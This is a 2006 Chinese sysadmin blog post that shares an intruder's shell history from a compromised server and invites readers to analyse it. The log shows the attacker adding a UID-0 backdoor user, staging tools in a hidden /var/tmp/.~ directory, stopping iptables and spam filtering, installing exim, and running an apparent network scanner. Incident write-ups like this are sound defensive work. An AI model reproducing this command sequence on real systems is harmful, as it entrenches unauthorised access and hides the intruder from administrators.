服务器被老外黑的過程記錄-snowtty-ChinaUnix博客

冰雪塵埃snowtty.blog.chinaunix.net

首页　| 　博文目录　| 　关于我

snowtty

博客访问： 5285894
博文数量： 1144
博客积分： 11974
博客等级：上将
技术积分： 12312
用户组：普通用户
注册时间： 2005-04-13 20:06

文章分类

全部博文（1144）

技术--Oracle&MyS（112）
编程--python编程（21）
编程--perl程序（183）
技术--防火墙类（9）
技术--samba类（7）
技术--apache类（18）
技术--netfilter（7）
工作--工作??（62）
生活--情感生活（116）
学习--英语学习（24）
学习--早先日志（46）
工作--周报总结（36）
学习--学习笔记（45）
技术--Rsync维护（11）
技术--OPENldap（1）
技术--squid维护（9）
技术--DNS 维护（17）
技术--FTP 维护（7）
技术--qmail维护（128）
技术--网络技术（26）
技术--linux 类（183）

openvpn（0）

nagios（10）
编程--awk&sed（11）
编程--shell编程（50）
未分配的博文（15）

文章存档

2017年（2）

2016年（14）

2015年（10）

2014年（28）

2013年（23）

2012年（29）

2011年（53）

2010年（86）

2009年（83）

2008年（43）

2007年（153）

2006年（575）

2005年（45）

我的朋友

相关博文

服务器被老外黑的過程記錄

分类： LINUX

2006-05-26 22:12:19

发表于: 2006-5-26 17:13

我得服务器被老外黑了！！因为密码太简单，自己玩的服务器，被黑无所谓，但是大家分析分析他都干了什么，下面是他打的命令：

427  w
  428  ifconfig
  429  adduser rc -u 0 -o -g 0
  430  passwd rc
  431  php -v
  432  netstat -nat
  433  cd /var/www/html/
  434  ls -la
  435  wget
  436  tar zxf SignIn.tar.gz
  437  netstat -nat
  438  w
  439  cd /var/tmp/
  440  wget
  441  rpm -ivh exim-4.43-1.i386.rpm
  442  rpm -qa |grep exim
  443  rpm -e exim-mon-4.43-1.RHEL4.3
  444  rpm -e exim-sa-4.43-1.RHEL4.3
  445  rpm -e exim-doc-4.43-1.RHEL4.3
  446  rpm -e exim-4.43-1.RHEL4.3
  447  rpm -ivh exim-4.43-1.i386.rpm
  448  netstat -nat
  449  hostname
  450  /etc/init.d/exim start
  451  netstat -natp
  452  ifconfig
  453  php -v
  454  mkdir .~
  455  cd .~
  456  wget
  457  tar zxf s.tar.gz
  458  ls- la
  459  ls -la
  460  rm -rf s.tar.gz
  461  mcedit system.php
  462  export LANG=c
  463  mcedit bla.txt
  464  mcedit list.txt
  465  cat >i
  466  hostname -F i
  467  /etc/init.d/exim start
  468  /etc/init.d/exim restart
  469  adduser kyle
  470  su kyle
  471  /etc/init.d/iptables stop
  472  netstat -natp
  473  kill -9 6683
  474  kill -9 2120
  475  kill -9 1811
  476  kill -9 2100
  477  kill -9 2334
  478  kill -9 2334
  479  kill -9 1382
  480  kill -9 2389
  481  kill -9 23010
  482  netstat -natp
  483  /etc/init.d/mysqld stop
  484  /etc/init.d/exim restart
  485  su kyle
  486  rpm -e sendmail-doc-8.13.1-2
  487  rpm -e sendmail-devel-8.13.1-2
  488  rpm -e sendmail-cf-8.13.1-2
  489  ifconfig
  490  php -f system.php
  491  netstat -natp
  492  w
  493  netstat -nat
  494  netstat -natp
  495  cd /var/tmp/
  496  ls -la
  497  cd .~
  498  ls -la
  499  rm -rf i
  500  hostname
  501  w
  502  passwd
  503  cd /var/named/
  504  ls -la
  505  cd chroot/var/named/
  506  ls -la
  507  mail
  508  mail
  509  /etc/init.d/spamassassin stop
  510  rpm -qa |grep spamassassin
  511  rpm -e spamassassin-3.0.1-0.EL4
  512  rpm -e spamassassin-3.0.1-0.EL4 --nodeps
  513  rpm -e evolutio
  514  rpm -qa |grep evolution-2.0.2-16.i386
  515  rpm -qa |grep evolution
  516  rpm -e evolution-devel-2.0.2-16
  517  rpm -e evolution-data-server-1.0.2-7
  518  rpm -e evolution-data-server-1.0.2-7 --nodeps
  519  rpm -e evolution-2.0.2-16
  520  rpm -e evolution-2.0.2-16 --nodeps
  521  rpm -e evolution-connector-2.0.2-5
  522  rpm -e evolution-webcal-1.0.10-1
  523  rpm -e evolution-data-server-devel-1.0.2-7
  524  /etc/init.d/exim restart
  525  mail
  526  ifconfig
  527  ifconfig
  528  cd /var/tmp/
  529  cd .~
  530  rm -rf *
  531  wget
  532  tar zxf kidu.tgz
  533  ls -la
  534  rm -rf kidu.tgz
  535  touch bios.txt uniq.txt vuln.txt viln.txt
  536  ./go.b 221.220
  537  cd /opt
  538  la
  539  ls

大家一起分析一下！

那些附件檔案我已存到郵箱了.進一步分析.(不是我的服務器哦)

阅读(1616) | 评论(2) | 转发(0) |

上一篇：Chapter 5 Advanced installation 总结

下一篇：Problems with SCSI controllers and devices

给主人留下些什么吧！~~

感谢所有关心和支持过ChinaUnix的朋友们

16024965号-6